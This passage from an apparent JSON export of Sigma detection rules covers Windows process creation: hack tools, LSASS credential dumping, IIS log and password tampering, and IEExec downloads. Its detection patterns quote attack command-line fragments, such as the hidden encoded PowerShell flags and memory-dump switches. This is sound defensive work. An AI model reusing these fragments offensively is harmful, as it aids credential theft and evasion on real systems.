    "content": "title: HackTool - Stracciatella Execution\nid: 7a4d9232-92fc-404d-8ce1-4c92e7caf539\nstatus: test\ndescription: Detects Stracciatella which executes a Powershell runspace from within C# (aka SharpPick technique) with AMSI, ETW and Script Block Logging disabled based on PE metadata characteristics.\nreferences:\n    - https://github.com/mgeeky/Stracciatella\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\nmodified: 2024-11-23\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Stracciatella.exe'\n        - OriginalFileName: 'Stracciatella.exe'\n        - Description: 'Stracciatella'\n        - Hashes|contains:\n              - 'SHA256=9d25e61ec1527e2a69d7c2a4e3fe2fe15890710c198a66a9f25d99fdf6c7b956'\n              - 'SHA256=fd16609bd9830c63b9413671678bb159b89c357d21942ddbb6b93add808d121a'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_sysmoneop.yml",
    "content": "title: HackTool - SysmonEOP Execution\nid: 8a7e90c5-fe6e-45dc-889e-057fe4378bd9\nstatus: test\ndescription: Detects the execution of the PoC that can be used to exploit Sysmon CVE-2022-41120\nreferences:\n    - https://github.com/Wh04m1001/SysmonEoP\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-12-04\nmodified: 2024-11-23\ntags:\n    - cve.2022-41120\n    - attack.t1068\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\SysmonEOP.exe'\n    selection_hash:\n        Hashes|contains:\n            - 'IMPHASH=22F4089EB8ABA31E1BB162C6D9BF72E5'\n            - 'IMPHASH=5123FA4C4384D431CD0D893EEB49BBEC'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_trufflesnout.yml",
    "content": "title: HackTool - TruffleSnout Execution\nid: 69ca006d-b9a9-47f5-80ff-ecd4d25d481a\nstatus: test\ndescription: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md\n    - https://github.com/dsnezhkov/TruffleSnout\n    - https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-02-13\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - OriginalFileName: 'TruffleSnout.exe'\n        - Image|endswith: '\\TruffleSnout.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_uacme.yml",
    "content": "title: HackTool - UACMe Akagi Execution\nid: d38d2fa4-98e6-4a24-aff1-410b0c9ad177\nstatus: test\ndescription: Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_pe:\n        - Product: 'UACMe'\n        - Company:\n              - 'REvol Corp'\n              - 'APT 92'\n              - 'UG North'\n              - 'Hazardous Environments'\n              - 'CD Project Rekt'\n        - Description:\n              - 'UACMe main module'\n              - 'Pentesting utility'\n        - OriginalFileName:\n              - 'Akagi.exe'\n              - 'Akagi64.exe'\n    selection_img:\n        Image|endswith:\n            - '\\Akagi64.exe'\n            - '\\Akagi.exe'\n    selection_hashes_sysmon:\n        Hashes|contains:\n            - 'IMPHASH=767637C23BB42CD5D7397CF58B0BE688'\n            - 'IMPHASH=14C4E4C72BA075E9069EE67F39188AD8'\n            - 'IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC'\n            - 'IMPHASH=7D010C6BB6A3726F327F7E239166D127'\n            - 'IMPHASH=89159BA4DD04E4CE5559F132A9964EB3'\n            - 'IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F'\n            - 'IMPHASH=5834ED4291BDEB928270428EBBAF7604'\n            - 'IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38'\n            - 'IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894'\n            - 'IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74'\n            - 'IMPHASH=3DE09703C8E79ED2CA3F01074719906B'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wce.yml",
    "content": "title: HackTool - Windows Credential Editor (WCE) Execution\nid: 7aa7009a-28b9-4344-8c1f-159489a390df\nstatus: test\ndescription: |\n    Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.\n    It is often used by threat actors for credential dumping and lateral movement within compromised networks.\nreferences:\n    - https://www.ampliasecurity.com/research/windows-credentials-editor/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-31\nmodified: 2025-10-21\ntags:\n    - attack.credential-access\n    - attack.t1003.001\n    - attack.s0005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith:\n            - '\\WCE.exe'\n            - '\\WCE64.exe'\n    selection_hash:\n        Hashes|contains:\n            - 'IMPHASH=136F0A8572C058A96436C82E541E4C41'\n            - 'IMPHASH=589657C64DDE88533186C39F82FA1F50'\n            - 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'\n            - 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'\n            - 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'\n            - 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'\n            - 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'\n            - 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'\n            - 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_winpeas.yml",
    "content": "title: HackTool - winPEAS Execution\nid: 98b53e78-ebaf-46f8-be06-421aafd176d9\nstatus: test\ndescription: WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz\nreferences:\n    - https://github.com/carlospolop/PEASS-ng\n    - https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation\nauthor: Georg Lauenstein (sure[secure])\ndate: 2022-09-19\nmodified: 2023-03-23\ntags:\n    - attack.privilege-escalation\n    - attack.discovery\n    - attack.t1082\n    - attack.t1087\n    - attack.t1046\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'winPEAS.exe'\n        - Image|endswith:\n              - '\\winPEASany_ofs.exe'\n              - '\\winPEASany.exe'\n              - '\\winPEASx64_ofs.exe'\n              - '\\winPEASx64.exe'\n              - '\\winPEASx86_ofs.exe'\n              - '\\winPEASx86.exe'\n    selection_cli_option:\n        CommandLine|contains:\n            - ' applicationsinfo' # Search installed applications information\n            - ' browserinfo' # Search browser information\n            - ' eventsinfo' # Display interesting events information\n            - ' fileanalysis' # Search specific files that can contains credentials and for regexes inside files\n            - ' filesinfo' # Search generic files that can contains credentials\n            - ' processinfo' # Search processes information\n            - ' servicesinfo' # Search services information\n            - ' windowscreds' # Search windows credentials\n    selection_cli_dl:\n        CommandLine|contains: 'https://github.com/carlospolop/PEASS-ng/releases/latest/download/'\n    selection_cli_specific:\n        - ParentCommandLine|endswith: ' -linpeas'\n        - CommandLine|endswith: ' -linpeas'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_winpwn.yml",
    "content": "title: HackTool - WinPwn Execution\nid: d557dc06-62e8-4468-a8e8-7984124908ce\nrelated:\n    - id: 851fd622-b675-4d26-b803-14bc7baa517a\n      type: similar\nstatus: test\ndescription: |\n    Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.\nauthor: Swachchhanda Shrawan Poudel\ndate: 2023-12-04\nreferences:\n    - https://github.com/S3cur3Th1sSh1t/WinPwn\n    - https://www.publicnow.com/view/EB87DB49C654D9B63995FAD4C9DE3D3CC4F6C3ED?1671634841\n    - https://reconshell.com/winpwn-tool-for-internal-windows-pentesting-and-ad-security/\n    - https://github.com/redcanaryco/atomic-red-team/blob/4d6c4e8e23d465af7a2388620cfe3f8c76e16cf0/atomics/T1082/T1082.md\n    - https://grep.app/search?q=winpwn&filter[repo][0]=redcanaryco/atomic-red-team\ntags:\n    - attack.credential-access\n    - attack.defense-evasion\n    - attack.discovery\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1046\n    - attack.t1082\n    - attack.t1106\n    - attack.t1518\n    - attack.t1548.002\n    - attack.t1552.001\n    - attack.t1555\n    - attack.t1555.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - 'Offline_Winpwn'\n            - 'WinPwn '\n            - 'WinPwn.exe'\n            - 'WinPwn.ps1'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wmiexec_default_powershell.yml",
    "content": "title: HackTool - Wmiexec Default Powershell Command\nid: 022eaba8-f0bf-4dd9-9217-4604b0bb3bb0\nstatus: test\ndescription: Detects the execution of PowerShell with a specific flag sequence that is used by the Wmiexec script\nreferences:\n    - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-03-08\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains: '-NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_wsass.yml",
    "content": "title: HackTool - WSASS Execution\nid: 589ac73f-8e12-409c-964e-31a2f5775ae2\nstatus: experimental\ndescription: |\n    Detects execution of WSASS, a tool used to dump LSASS memory on Windows systems by leveraging WER's\n    (Windows Error Reporting) WerFaultSecure.EXE to bypass PPL (Protected Process Light) protections.\nreferences:\n    - https://github.com/TwoSevenOneT/WSASS\n    - https://www.zerosalarium.com/2025/09/Dumping-LSASS-With-WER-On-Modern-Windows-11.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-23\nmodified: 2026-01-09\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|endswith: '\\wsass.exe'\n    selection_hash:\n        Hashes|contains: 'IMPHASH=32F5095C9BBDCACF28FD4060EB4DFC42'\n    selection_cli:\n        # change to |re|i after Sigma v2.0 release\n        # plain string without quotation marks as it has to match for both ' and \"\n        CommandLine|re: (?i)\\.exe[\\\"\\']?\\s+[^\\\"]{0,64}werfaultsecure\\.exe[\\\"\\']?\\s+\\d{2,10} # wsass.exe \"path to werfaultsecure\" lsass_pid\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_wsass/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_xordump.yml",
    "content": "title: HackTool - XORDump Execution\nid: 66e563f9-1cbd-4a22-a957-d8b7c0f44372\nstatus: test\ndescription: Detects suspicious use of XORDump process memory dumping utility\nreferences:\n    - https://github.com/audibleblink/xordump\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-01-28\nmodified: 2023-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\n    - attack.t1003.001\n    - attack.credential-access\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\xordump.exe'\n        - CommandLine|contains:\n              - ' -process lsass.exe '\n              - ' -m comsvcs '\n              - ' -m dbghelp '\n              - ' -m dbgcore '\n    condition: selection\nfalsepositives:\n    - Another tool that uses the command line switches of XORdump\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_zipexec.yml",
    "content": "title: Suspicious ZipExec Execution\nid: 90dcf730-1b71-4ae7-9ffc-6fcf62bd0132\nstatus: test\ndescription: ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file.\nreferences:\n    - https://twitter.com/SBousseaden/status/1451237393017839616\n    - https://github.com/Tylous/ZipExec\nauthor: frack113\ndate: 2021-11-07\nmodified: 2022-12-25\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1218\n    - attack.t1202\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    run:\n        CommandLine|contains|all:\n            - '/generic:Microsoft_Windows_Shell_ZipFolder:filename='\n            - '.zip'\n            - '/pass:'\n            - '/user:'\n    delete:\n        CommandLine|contains|all:\n            - '/delete'\n            - 'Microsoft_Windows_Shell_ZipFolder:filename='\n            - '.zip'\n    condition: run or delete\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hostname_execution.yml",
    "content": "title: Suspicious Execution of Hostname\nid: 7be5fb68-f9ef-476d-8b51-0256ebece19e\nstatus: test\ndescription: Use of hostname to get information\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows\n    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname\nauthor: frack113\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1082\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\HOSTNAME.EXE'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hvci_registry_tampering.yml",
    "content": "title: Hypervisor-protected Code Integrity (HVCI) Related Registry Tampering Via CommandLine\nid: 6225c53a-a96e-4235-b28f-8d7997cd96eb\nrelated:\n    - id: 8b7273a4-ba5d-4d8a-b04f-11f2900d043a\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the tampering of Hypervisor-protected Code Integrity (HVCI) related registry values via command line tool reg.exe.\n    HVCI uses virtualization-based security to protect code integrity by ensuring that only trusted code can run in kernel mode.\n    Adversaries may tamper with HVCI to load malicious or unsigned drivers, which can be used to escalate privileges, maintain persistence, or evade security mechanisms.\nreferences:\n    - https://www.sophos.com/en-us/blog/sharpening-the-knife-gold-blades-strategic-evolution\n    - https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-26\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'add '\n            - 'New-ItemProperty '\n            - 'Set-ItemProperty '\n            - 'si '  # SetItem Alias\n    selection_cli_base:\n        CommandLine|contains: '\\DeviceGuard'\n    selection_cli_key:\n        CommandLine|contains:\n            - 'EnableVirtualizationBasedSecurity'\n            - 'HypervisorEnforcedCodeIntegrity'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate system administration tasks that require disabling HVCI for troubleshooting purposes when certain drivers or applications are incompatible with it.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hvci_registry_tampering/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Disable Hypervisor-Enforced Code Integrity (HVCI)\n      technique: T1562.001\n      atomic_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hwp_exploits.yml",
    "content": "title: Suspicious HWP Sub Processes\nid: 023394c4-29d5-46ab-92b8-6a534c6f447b\nstatus: test\ndescription: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation\nreferences:\n    - https://www.securitynewspaper.com/2016/11/23/technical-teardown-exploit-malware-hwp-files/\n    - https://www.hybrid-analysis.com/search?query=context:74940dcc5b38f9f9b1a0fea760d344735d7d91b610e6d5bd34533dd0153402c5&from_sample=5db135000388385a7644131f&block_redirect=1\n    - https://twitter.com/cyberwar_15/status/1187287262054076416\n    - https://blog.alyac.co.kr/1901\n    - https://en.wikipedia.org/wiki/Hangul_(word_processor)\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.initial-access\n    - attack.t1566.001\n    - attack.execution\n    - attack.t1203\n    - attack.t1059.003\n    - attack.g0032\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\Hwp.exe'\n        Image|endswith: '\\gbb.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hxtsr_masquerading.yml",
    "content": "title: Potential Fake Instance Of Hxtsr.EXE Executed\nid: 4e762605-34a8-406d-b72e-c1a089313320\nstatus: test\ndescription: |\n    HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.\n    HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\".\n    Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe\nreferences:\n    - Internal Research\nauthor: Sreeman\ndate: 2020-04-17\nmodified: 2024-02-08\ntags:\n    - attack.defense-evasion\n    - attack.t1036\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    # TODO: Link this to the more generic system process rule\n    selection:\n        Image|endswith: '\\hxtsr.exe'\n    filter_main_hxtsr:\n        Image|contains: ':\\program files\\windowsapps\\microsoft.windowscommunicationsapps_'\n        Image|endswith: '\\hxtsr.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_icacls_deny.yml",
    "content": "title: Use Icacls to Hide File to Everyone\nid: 4ae81040-fc1c-4249-bfa3-938d260214d9\nstatus: test\ndescription: Detect use of icacls to deny access for everyone in Users folder sometimes used to hide malicious files\nreferences:\n    - https://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/\nauthor: frack113\ndate: 2022-07-18\nmodified: 2024-04-29\ntags:\n    - attack.defense-evasion\n    - attack.t1564.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_icacls:\n        - OriginalFileName: 'iCACLS.EXE'\n        - Image|endswith: '\\icacls.exe'\n    selection_cmd: # icacls \"C:\\Users\\admin\\AppData\\Local\\37f92fe8-bcf0-4ee0-b8ba-561f797f5696\" /deny *S-1-1-0:(OI)(CI)(DE,DC)\n        CommandLine|contains|all:\n            - '/deny'\n            - '*S-1-1-0:'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ieexec_download.yml",
    "content": "title: File Download And Execution Via IEExec.EXE\nid: 9801abb8-e297-4dbf-9fbd-57dde0e830ad\nstatus: test\ndescription: Detects execution of the IEExec utility to download and execute files\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Ieexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-05-16\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\IEExec.exe'\n        - OriginalFileName: 'IEExec.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'http://'\n            - 'https://'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iexpress_susp_execution.yml",
    "content": "title: Self Extracting Package Creation Via Iexpress.EXE From Potentially Suspicious Location\nid: b2b048b0-7857-4380-b0fb-d3f0ab820b71\nstatus: test\ndescription: |\n    Detects the use of iexpress.exe to create binaries via Self Extraction Directive (SED) files located in potentially suspicious locations.\n    This behavior has been observed in-the-wild by different threat actors.\nreferences:\n    - https://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\n    - https://en.wikipedia.org/wiki/IExpress\n    - https://decoded.avast.io/janvojtesek/raspberry-robins-roshtyak-a-little-lesson-in-trickery/\n    - https://www.virustotal.com/gui/file/602f4ae507fa8de57ada079adff25a6c2a899bd25cd092d0af7e62cdb619c93c/behavior\nauthor: Joseliyo Sanchez, @Joseliyo_Jstnk, Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-02-05\nmodified: 2024-06-04\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    # VT Query: behavior_processes:\"iexpress.exe\" and behavior_processes:\"/n /q /m\" and behavior_processes:\"*.sed*\" and p:5+\n    selection_img:\n        - Image|endswith: '\\iexpress.exe'\n        - OriginalFileName: 'IEXPRESS.exe'\n    selection_cli:\n        CommandLine|contains|windash: ' /n '\n    selection_paths:\n        CommandLine|contains:\n            # Note: Add more uncommon paths that fit your organizational needs.\n            - ':\\ProgramData\\'\n            - ':\\Temp\\'\n            - ':\\Windows\\System32\\Tasks\\'\n            - ':\\Windows\\Tasks\\'\n            - ':\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n    condition: all of selection_*\nfalsepositives:\n    - Administrators building packages using iexpress.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml",
    "content": "title: Disable Windows IIS HTTP Logging\nid: e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e\nstatus: test\ndescription: Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging\nauthor: frack113\ndate: 2022-01-09\nmodified: 2023-01-22\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'set'\n            - 'config'\n            - 'section:httplogging'\n            - 'dontLog:true'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml",
    "content": "title: Microsoft IIS Service Account Password Dumped\nid: 2d3cdeec-c0db-45b4-aa86-082f7eb75701\nstatus: test\ndescription: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords\nreferences:\n    - https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html\n    - https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA\n    - https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/\nauthor: Tim Rauch, Janantha Marasinghe, Elastic (original idea)\ndate: 2022-11-08\nmodified: 2023-01-22\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_base_name:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_base_list:\n        CommandLine|contains: 'list '\n    selection_standalone:\n        CommandLine|contains:\n            - ' /config' # https://pbs.twimg.com/media/FgydDAJWIAEio34?format=png&name=900x900\n            - ' /xml'\n            # We cover the \"-\" version just in case :)\n            - ' -config'\n            - ' -xml'\n    selection_cmd_flags:\n        CommandLine|contains:\n            - ' /@t' # Covers both \"/@text:*\" and \"/@t:*\"\n            - ' /text'\n            - ' /show'\n            # We cover the \"-\" version just in case :)\n            - ' -@t'\n            - ' -text'\n            - ' -show'\n    selection_cmd_grep:\n        CommandLine|contains:\n            - ':\\*'\n            - 'password'\n    condition: all of selection_base_* and (selection_standalone or all of selection_cmd_*)\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_module_install.yml",
    "content": "title: IIS Native-Code Module Command Line Installation\nid: 9465ddf4-f9e4-4ebd-8d98-702df3a93239\nstatus: test\ndescription: Detects suspicious IIS native-code module installations via command line\nreferences:\n    - https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/\n    - https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-11\nmodified: 2024-03-13\ntags:\n    - attack.persistence\n    - attack.t1505.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'install'\n            - 'module'\n        CommandLine|contains|windash: '-name:'\n    filter_iis_setup:\n        ParentImage: 'C:\\Windows\\System32\\inetsrv\\iissetup.exe'\n    condition: all of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown as it may vary from organisation to organisation how admins use to install IIS modules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_appcmd_susp_rewrite_rule.yml",
    "content": "title: Suspicious IIS URL GlobalRules Rewrite Via AppCmd\nid: 7c8af9b2-dcae-41a2-a9db-b28c288b5f08\nstatus: test\ndescription: Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.\nreferences:\n    - https://twitter.com/malmoeb/status/1616702107242971144\n    - https://learn.microsoft.com/en-us/answers/questions/739120/how-to-add-re-write-global-rule-with-action-type-r\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\ntags:\n    - attack.defense-evasion\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\appcmd.exe'\n        - OriginalFileName: 'appcmd.exe'\n    selection_cli:\n        CommandLine|contains|all:\n            - 'set'\n            - 'config'\n            - 'section:system.webServer/rewrite/globalRules'\n            - 'commit:'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of appcmd to add new URL rewrite rules\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml",
    "content": "title: Microsoft IIS Connection Strings Decryption\nid: 97dbf6e2-e436-44d8-abee-4261b24d3e41\nstatus: test\ndescription: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.\nreferences:\n    - https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-28\nmodified: 2022-12-30\ntags:\n    - attack.credential-access\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_name:\n        - Image|endswith: '\\aspnet_regiis.exe'\n        - OriginalFileName: 'aspnet_regiis.exe'\n    selection_args:\n        CommandLine|contains|all:\n            - 'connectionStrings'\n            - ' -pdf'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_iis_logs_deletion.yml",
    "content": "title: IIS WebServer Log Deletion via CommandLine Utilities\nid: 0649be4a-aeb0-45b0-b89e-7f1668f6d9c0\nrelated:\n    - id: 3eb8c339-a765-48cc-a150-4364c04652bf\n      type: similar\nstatus: experimental\ndescription: |\n    Detects attempts to delete Internet Information Services (IIS) log files via command line utilities, which is a common defense evasion technique used by attackers to cover their tracks.\n    Threat actors often abuse vulnerabilities in web applications hosted on IIS servers to gain initial access and later delete IIS logs to evade detection.\nreferences:\n    - https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/managing-iis-log-file-storage\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\cmd.exe'\n              - '\\powershell_ise.exe'\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'cmd.exe'\n              - 'powershell.exe'\n              - 'powershell_ise.exe'\n              - 